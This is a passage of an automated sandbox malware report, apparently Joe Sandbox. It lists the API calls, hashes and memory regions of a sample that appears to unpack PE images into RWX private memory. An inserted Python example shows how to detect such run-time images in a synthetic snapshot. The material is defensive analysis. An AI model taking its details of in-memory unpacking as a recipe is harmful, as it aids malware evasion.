                                                                                                                                                                                          • Opcode Fuzzy Hash: d775a197f71d536e5d52874a7a30662ad33d8ad4d8240f212ad1ffb4432d1cba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 11519D71A11B09AFEB30DF69D841A6A7BF4FB58720F14456BE80AD7360F735AE418B40
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,1238F234), ref: 123793CF
• WideCharToMultiByte.KERNEL32(00000000,00000000,123A2764,000000FF,00000000,0000003F,00000000,?,?), ref: 12379447
• WideCharToMultiByte.KERNEL32(00000000,00000000,123A27B8,000000FF,?,0000003F,00000000,?), ref: 12379474
• _free.LIBCMT ref: 123793BD
  • Part of subcall function 12376782: RtlFreeHeap.NTDLL(00000000,00000000,?,12380C6F,?,00000000,?,00000000,?,12380F13,?,00000007,?,?,1238145E,?), ref: 12376798
  • Part of subcall function 12376782: GetLastError.KERNEL32(?,?,12380C6F,?,00000000,?,00000000,?,12380F13,?,00000007,?,?,1238145E,?,?), ref: 123767AA
• _free.LIBCMT ref: 12379589
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 1286116820-0
• Opcode ID: aa1f5272f45c70243794974ae07828d6c9eea462e0e8bf93315b9b35cc68aea4
• Instruction ID: a8d420e18f08df16f4252e28f1ab6b4d7d2f7c1d7eca179fcc18c5cbbb9e2ce5
• Opcode Fuzzy Hash: aa1f5272f45c70243794974ae07828d6c9eea462e0e8bf93315b9b35cc68aea4
• Instruction Fuzzy Hash: BB51A7B7900269AFCF10DFA48C849EAB7BCEF84360B11077AE554D7281E7389A41DB50
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
• Instruction ID: ecb68656b34b73c70a857b42148ea328f8e4172c0accb7cf6435e3ab80b7b7e6
• Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
• Instruction Fuzzy Hash: 3741E232A002049FCB24DFBCC885A5EBBA5FF88314F1545AAE955EB391E731AD01CB80
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID:
• String ID: IS_STRUC(base->tpMask)$IS_STRUC(derv->tpMask)$XXTYPE.CPP$XXTYPE.CPP$XXTYPE.CPP$derv->tpClass.tpcFlags & CF_HAS_BASES
• API String ID: 0-131784352
• Opcode ID: fb1bc3a81ee95ff01b21cbe901d4932e46fe31dd037e4dd5e9f2a02a155a0d32
• Instruction ID: ffc6d6ff1f84cd42ec22ab39dec13b0b7ff5da0dc2e01e5e5f00b47da449b396
• Opcode Fuzzy Hash: fb1bc3a81ee95ff01b21cbe901d4932e46fe31dd037e4dd5e9f2a02a155a0d32
• Instruction Fuzzy Hash: E141D3B1B04304A7EB108A12DC46BAB77609BD0714F1C907BFE047A2C5D37DD991C29A
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,1235DD01,?,?,?,00000001,00000000,?,00000001,1235DD01,1235DD01), ref: 12381179
• __alloca_probe_16.LIBCMT ref: 123811B1
• MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,1235DD01,?,?,?,00000001,00000000,?,00000001,1235DD01,1235DD01,?), ref: 12381202
• GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,1235DD01,1235DD01,?,00000002,00000000), ref: 12381214
• __freea.LIBCMT ref: 1238121D
  • Part of subcall function 12376137: RtlAllocateHeap.NTDLL(00000000,123652BC,?,?,12368847,?,?,00000000,?,?,1233DE62,123652BC,?,?,?,?), ref: 12376169
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
• String ID:
• API String ID: 313313983-0
• Opcode ID: a662cb9a8bc0f94705c01a32af0c70ff44f913e4c1fc550476bc0d3c7a741e51
• Instruction ID: 23ebe9e4613ffd333672045004a9435d826e3f1ad7206088ad8350c2ff84f50d
• Opcode Fuzzy Hash: a662cb9a8bc0f94705c01a32af0c70ff44f913e4c1fc550476bc0d3c7a741e51
• Instruction Fuzzy Hash: 4F31BE76A1021AABDF25CFA5CC84DFE7BA9EB40714B014368EC44DB290E735D961CBA0
Uniqueness

Uniqueness Score: -1.00%

Strings
• varType->tpClass.tpcFlags & CF_HAS_DTOR, xrefs: 004037A0
• XX.CPP, xrefs: 004037EA
• XX.CPP, xrefs: 004037B8
• XX.CPP, xrefs: 0040379B
• varType->tpClass.tpcDtorAddr, xrefs: 004037BD
• (errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags, xrefs: 004037EF
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID:
• String ID: (errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags$XX.CPP$XX.CPP$XX.CPP$varType->tpClass.tpcDtorAddr$varType->tpClass.tpcFlags & CF_HAS_DTOR
• API String ID: 0-245352462
• Opcode ID: 9e17b5a84bb40e683efab63a096b28be77a14cb4e0ad1c14d600fc567c2284c9
• Instruction ID: 2851ccdddbce733e0003dc1ec9fa6ed38ed7316f3c2f9070df04e85540b4e2d4
• Opcode Fuzzy Hash: 9e17b5a84bb40e683efab63a096b28be77a14cb4e0ad1c14d600fc567c2284c9
• Instruction Fuzzy Hash: 1921D3B1D002099BCB00EF40C986A6A7BA8AF10715F20817AFC043B2C1D3788E5587EA
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 1464715C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1464717F
  • Part of subcall function 146456D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 14645702
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 146471A5
• _free.LIBCMT ref: 146471B8
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 146471C7
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: 256856f77888578785a9fabcd2543e9111214d6b42ec896f497ade40655f12e0
• Instruction ID: 0f095fd6acccf0c86ba198f1203db75c5a5a5b6b2da8a79e94520c3a21ad879e
• Opcode Fuzzy Hash: 256856f77888578785a9fabcd2543e9111214d6b42ec896f497ade40655f12e0
• Instruction Fuzzy Hash: 69018876A012257F6F110AB65C88D7B696DDAD6DAA33D012DFE04D7240DE749C0281B4
Uniqueness

Uniqueness Score: -1.00%
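The memory-dump descriptors above mark three regions as "based on PE": the submitted image at 0x00400000 (descriptor fields 00000020 / 01000000) and two regions at 0x12330000 and 0x14640000 (fields 00000040 / 00020000, with the 0x14640000 header page at 00000004). Read as Win32 constants, which is an assumption made for this example and not something the report documents, those are PAGE_EXECUTE_READ in a MEM_IMAGE mapping versus PAGE_EXECUTE_READWRITE (or PAGE_READWRITE for the header page) in MEM_PRIVATE memory: a PE header in image-backed memory is the loader's work, a PE header in private memory was written at run time. The following added example, which is not code from the Joe Sandbox report or its IDA plugin, applies that check to a constructed process snapshot whose bases and protections mirror the descriptors; all region contents are synthetic.

```python
"""Flag PE images that live in dynamically allocated process memory.

Added example, not code from the Joe Sandbox report. Region records are
constructed inline; bases and protection/type values follow the report's
memory-dump descriptors on the assumption that those fields are the Win32
PAGE_* and MEM_* constants.
"""
from dataclasses import dataclass
import struct

# winnt.h memory protection constants
PAGE_READWRITE = 0x04
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
# winnt.h region type constants (MEMORY_BASIC_INFORMATION.Type)
MEM_PRIVATE = 0x00020000
MEM_MAPPED = 0x00040000
MEM_IMAGE = 0x01000000

EXECUTABLE = {PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}
WRITABLE = {PAGE_READWRITE, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}


@dataclass(frozen=True)
class Region:
    base: int
    protect: int      # PAGE_* value
    region_type: int  # MEM_IMAGE / MEM_MAPPED / MEM_PRIVATE
    data: bytes       # leading bytes of the region as captured in the snapshot


def looks_like_pe(data: bytes) -> bool:
    """True when data starts with a DOS header whose e_lfanew points at the PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def verdict(region: Region) -> str:
    """Classify one region; only 'pe-*' verdicts indicate an image written at run time."""
    if region.region_type == MEM_IMAGE:
        return "image"   # file-backed mapping created by the loader; a PE header is expected here
    has_pe = looks_like_pe(region.data)
    executable = region.protect in EXECUTABLE
    writable = region.protect in WRITABLE
    if has_pe and executable and writable:
        return "pe-rwx"  # unpacked or injected image sitting in RWX private memory
    if has_pe and executable:
        return "pe-x"    # image whose header page was re-protected to read/execute
    if has_pe:
        return "pe-rw"   # header staged in RW memory, or a manually mapped image with per-page rights
    if executable and writable:
        return "rwx"     # executable private memory without a header: shellcode or a section body
    return "benign"


def find_dynamic_pe(regions) -> list:
    """Return (base, verdict) for every region holding a PE header outside a loaded image."""
    return [(r.base, verdict(r)) for r in regions if verdict(r).startswith("pe-")]


def tiny_pe_header() -> bytes:
    """Constructed minimal header: 0x40-byte DOS header, e_lfanew = 0x40, then the PE signature."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\0\0" + b"\x4c\x01"  # IMAGE_FILE_MACHINE_I386


# Constructed snapshot: bases and flags follow the report's descriptors, contents are synthetic.
SAMPLE_REGIONS = [
    Region(0x00400000, PAGE_EXECUTE_READ, MEM_IMAGE, tiny_pe_header()),            # submitted executable
    Region(0x00A00000, PAGE_READWRITE, MEM_PRIVATE, b"\0" * 0x100),                # ordinary heap
    Region(0x12330000, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, tiny_pe_header()),     # RWX private, PE header
    Region(0x14640000, PAGE_READWRITE, MEM_PRIVATE, tiny_pe_header()),             # RW header page ...
    Region(0x14641000, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, b"\x55\x8b\xec" * 8),  # ... RWX code page, no header
    Region(0x77000000, PAGE_EXECUTE_READ, MEM_IMAGE, tiny_pe_header()),            # a system DLL
]

if __name__ == "__main__":
    for base, v in find_dynamic_pe(SAMPLE_REGIONS):
        print(f"{base:#010x} {v}")
```

Run against the constructed snapshot, the two private regions with headers are reported and the image-backed ones are not; the RWX page at 0x14641000 is deliberately left out of the PE verdicts because it carries no header, which is why a real scan should pair this check with one that walks the section table of each flagged header to cover the pages that follow it.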

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 1237F363
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1237F386
  • Part of subcall function 12376137: RtlAllocateHeap.NTDLL(00000000,123652BC,?,?,12368847,?,?,00000000,?,?,1233DE62,123652BC,?,?,?,?), ref: 12376169
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 1237F3AC
• _free.LIBCMT ref: 1237F3BF
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 1237F3CE
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: 0ea0509e3bfeac905872f8cf52d9e7be55e933f0b3e0cbcdcce4618197031c8f
• Instruction ID: 2d9fd041dd4c400bb9a144f41356eb83f6d3490279c00c4061a2739c16e2ebe4
• Opcode Fuzzy Hash: 0ea0509e3bfeac905872f8cf52d9e7be55e933f0b3e0cbcdcce4618197031c8f
• Instruction Fuzzy Hash: B80171B76053257F7B2206BA5C8CCBB7A6DEBC6AA53110229F908C6240DA6CDD02D5B0
Uniqueness

Uniqueness Score: -1.00%

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 12341170
• int.LIBCPMT ref: 12341183
  • Part of subcall function 1233E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 1233E0D2
  • Part of subcall function 1233E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 1233E0EC
• std::_Facet_Register.LIBCPMT ref: 123411C3
• std::_Lockit::~_Lockit.LIBCPMT ref: 123411CC
• __CxxThrowException@8.LIBVCRUNTIME ref: 123411EA
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID:
• API String ID: 2536120697-0
• Opcode ID: c9dcdd48756be27e863de99208c76d6f3171a069607a25d97553f85f8e59e77e
• Instruction ID: 27d94098e47e7f310a1b194b0b50d15cee33806a987297a40b145977708ce138
• Opcode Fuzzy Hash: c9dcdd48756be27e863de99208c76d6f3171a069607a25d97553f85f8e59e77e
• Instruction Fuzzy Hash: 5B11CD77A0011C9BCB25DFA5D8449FDBBBC9F80751B200556E845A7190DF70AF41DBD0
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005CB158
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005CB171
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Value___vcrt_
• String ID:
• API String ID: 1426506684-0
• Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
• Instruction ID: 05cc5d0d5dc3713a6351f76c81595380f8b82261c5b4ca64aedac5180b52659f
• Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
• Instruction Fuzzy Hash: EB01B5722087526EB72416F87CAAF666FA9FB41775F28023EF518415F1EF514C81D244
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,?,00000000,1464636D,14645713,00000000,?,14642249,?,?,14641D66,00000000,?,?,00000000), ref: 14645B7F
• _free.LIBCMT ref: 14645BB4
• _free.LIBCMT ref: 14645BDB
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 14645BE8
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 14645BF1
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 4fb1e77c933c0ab84f8e6cc91b7d3d7a465e406e1eebc03eed0c4942d70428e9
• Instruction ID: 490148fbf5864089f88eaa16e42ac55f5fbfe2084536295d7243b96ec4a8bb98
• Opcode Fuzzy Hash: 4fb1e77c933c0ab84f8e6cc91b7d3d7a465e406e1eebc03eed0c4942d70428e9
• Instruction Fuzzy Hash: 4D01F93A206651F7EF1366345CD4D1B2A2EDBF197C73C0128FB15E7A41EE3498024128
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,00000000,00000000,1236BC87,00000000,?,?,1236BD0B,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 1237829E
• _free.LIBCMT ref: 123782D3
• _free.LIBCMT ref: 123782FA
• SetLastError.KERNEL32(00000000,?,1233A71B), ref: 12378307
• SetLastError.KERNEL32(00000000,?,1233A71B), ref: 12378310
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 0263fbbeafd0ee5cee829496d3831ee7ba65e6e9fb604477f3968cce057d10a2
• Instruction ID: 28f31838c35d7e8ef3e16959019cd535de7a7a2d2d22d8b407ed5e0b83a5da00
• Opcode Fuzzy Hash: 0263fbbeafd0ee5cee829496d3831ee7ba65e6e9fb604477f3968cce057d10a2
• Instruction Fuzzy Hash: EC01F97F544B557BDB1216285CC8A9B261E9BC13B67200728FC18E2280EF7CCC01B260
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 1234C1F5
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 1234C208
• GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 1234C228
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 1234C233
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 1234C23B
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Process$CloseHandleOpen$FileImageName
• String ID:
• API String ID: 2951400881-0
• Opcode ID: e95f23367b982920127ee928513248e4d709dedb8e9fd6638abd832ea0cbfe9e
• Instruction ID: 4fb16f745c4932fa3d3b85b09327759d7b74a73da661b1f6b2cb5e034783ebc2
• Opcode Fuzzy Hash: e95f23367b982920127ee928513248e4d709dedb8e9fd6638abd832ea0cbfe9e
• Instruction Fuzzy Hash: 570126F72802256BDA1256D48C88FA7B3FCDB84A81F1006A1FA48D3281EEA09D41C771
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,?,?,?,?,146410DF,?,?,?,00000000), ref: 14641E9A
• lstrcatW.KERNEL32(?,?), ref: 14641EAC
• lstrlenW.KERNEL32(?,?,146410DF,?,?,?,00000000), ref: 14641EB3
• lstrlenW.KERNEL32(?,?,146410DF,?,?,?,00000000), ref: 14641EC8
• lstrcatW.KERNEL32(?,146410DF), ref: 14641ED3
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: lstrlen$lstrcat
• String ID:
• API String ID: 493641738-0
• Opcode ID: c20e5f94a98ccd16e8a185d04cb2feda64350f30f6fd062fbc1eba903bf40375
• Instruction ID: fd450ad0d53a389e64ce6dd8e73d6a88fde36421add86ab3ad1df17437302984
• Opcode Fuzzy Hash: c20e5f94a98ccd16e8a185d04cb2feda64350f30f6fd062fbc1eba903bf40375
• Instruction Fuzzy Hash: 0EF0892A601120BADB222B19BCC5EBF777CEFD6A68B18001DF608831909B65594392B5
Uniqueness
Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 146491D0
  • Part of subcall function 1464571E: HeapFree.KERNEL32(00000000,00000000,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?), ref: 14645734
  • Part of subcall function 1464571E: GetLastError.KERNEL32(?,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?,?), ref: 14645746
• _free.LIBCMT ref: 146491E2
• _free.LIBCMT ref: 146491F4
• _free.LIBCMT ref: 14649206
• _free.LIBCMT ref: 14649218
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 324994140fff126b3bf84ddf3385b41fd0ace57581a3b0c73c9e2fcde635d477
• Instruction ID: 6231f666cf3733d7e679dc9b69bdf59952144edf15e7d93b0b3b5d2c3957714f
• Opcode Fuzzy Hash: 324994140fff126b3bf84ddf3385b41fd0ace57581a3b0c73c9e2fcde635d477
• Instruction Fuzzy Hash: 8CF0FF7195525097DF21DA64D5C5C1A7FDDEB2065C7784819EA49DBA00CE31F8808A5C
Uniqueness
Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 1464536F
  • Part of subcall function 1464571E: HeapFree.KERNEL32(00000000,00000000,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?), ref: 14645734
  • Part of subcall function 1464571E: GetLastError.KERNEL32(?,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?,?), ref: 14645746
• _free.LIBCMT ref: 14645381
• _free.LIBCMT ref: 14645394
• _free.LIBCMT ref: 146453A5
• _free.LIBCMT ref: 146453B6
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 80351875d5ba9127fa1c91f532cdf60e631ecdeb2f1d66b783156a7a4be137b4
• Instruction ID: 6a57bcdfabcd5558616692fb960fea5f80f594d19fc36b86e40f896f820d77cf
• Opcode Fuzzy Hash: 80351875d5ba9127fa1c91f532cdf60e631ecdeb2f1d66b783156a7a4be137b4
• Instruction Fuzzy Hash: 54F0B774915234DBDB22EF24D9D04183FADE724AEC76941AEE9109B750EB3158829B88
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
• Instruction ID: cc706be78aa66dfe3d56ca5a22c81b624ed334637ae42726f98964afea0ffe37
• Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
• Instruction Fuzzy Hash: ECF012B18046219FCA31EB2CBD456093B65BB48B20B0441A7F41CA2B70D7B04AC2CFCF
Uniqueness
Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 12374066
  • Part of subcall function 12376782: RtlFreeHeap.NTDLL(00000000,00000000,?,12380C6F,?,00000000,?,00000000,?,12380F13,?,00000007,?,?,1238145E,?), ref: 12376798
  • Part of subcall function 12376782: GetLastError.KERNEL32(?,?,12380C6F,?,00000000,?,00000000,?,12380F13,?,00000007,?,?,1238145E,?,?), ref: 123767AA
• _free.LIBCMT ref: 12374078
• _free.LIBCMT ref: 1237408B
• _free.LIBCMT ref: 1237409C
• _free.LIBCMT ref: 123740AD
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 1fa212aea2e094c9b98041fc7b4ea83fb12ca6ce6ebaaa8b22a46a8b30ae5b5b
• Instruction ID: 60aedf6ba90c73e333abf20d0eadc7911d2e39a27a38415b1b6fdf571c54cf53
• Opcode Fuzzy Hash: 1fa212aea2e094c9b98041fc7b4ea83fb12ca6ce6ebaaa8b22a46a8b30ae5b5b
• Instruction Fuzzy Hash: 42F090FA8801398FEB318F2898C04153B29F7947A13405A2AF029D2660CB395E42EFC2
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetVersionExA.KERNEL32(?), ref: 0040B63E
• TlsAlloc.KERNEL32(?), ref: 0040B64F
• VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 0040B665
• TlsSetValue.KERNEL32(?,?,?,?,0000001C,?), ref: 0040B676
• TlsAlloc.KERNEL32(?,?,?,?,0000001C,?), ref: 0040B67B
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
